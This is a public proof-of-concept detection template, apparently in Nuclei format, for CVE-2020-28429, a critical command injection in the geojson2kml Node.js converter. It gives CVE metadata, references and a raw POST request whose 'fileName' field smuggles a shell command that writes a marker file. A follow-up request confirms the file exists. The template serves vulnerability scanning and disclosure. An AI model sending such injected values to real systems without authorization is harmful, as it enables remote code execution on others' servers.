漏洞描述
Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content.
CVE-2020-28429: geojson2kml - Command Injection
PoC代码[已公开]
id: CVE-2020-28429
info:
name: geojson2kml - Command Injection
author: eeche,chae1xx1os,persona-twotwo,soonghee2
severity: critical
description: |
Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content.
impact: |
Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, privilege escalation
remediation: |
Do not use geojson2kml. There is no fixed version for geojson2kml.
reference:
- https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412
- https://github.com/advisories/GHSA-w83x-fp72-p9qc
- https://nvd.nist.gov/vuln/detail/CVE-2020-28429
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-28429
cwe-id: CWE-78
epss-score: 0.8235
epss-percentile: 0.9918
cpe: cpe:2.3:a:geojson2kml_project:geojson2kml:*:*:*:*:*:node.js:*:*
metadata:
max-request: 1
vendor: geojson2kml_project
product: geojson2kml
framework: node.js
tags: cve,cve2020,rce,geojson2kml,file-upload,intrusive
variables:
filename: '{{rand_base(6)}}'
http:
- raw:
- |
POST /convert HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"fileName": "& echo \"{{randstr}}\" > {{filename}}.txt && ls",
"geoJsonData": {
"type": "FeatureCollection",
"features": [
{
"type": "Feature",
"geometry": {
"type": "Point",
"coordinates": [102.0, 0.5]
},
"properties": {
"prop0": "value0"
}
}
]
}
}
- |
GET /file/{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "{{randstr}}"
- type: word
part: header_2
words:
- "text/html"
- type: status
status:
- 200
# digest: 4b0a00483046022100ed8eac45fc5f5da14cf377176ffbe2b2e4684e388ed156ece3e3929880810e9d022100cc357427dda2eb2919e8c45857d11a41b474fe6368de843af72d9bbe3817f701:922c64590222798bb761d5b6d8e72950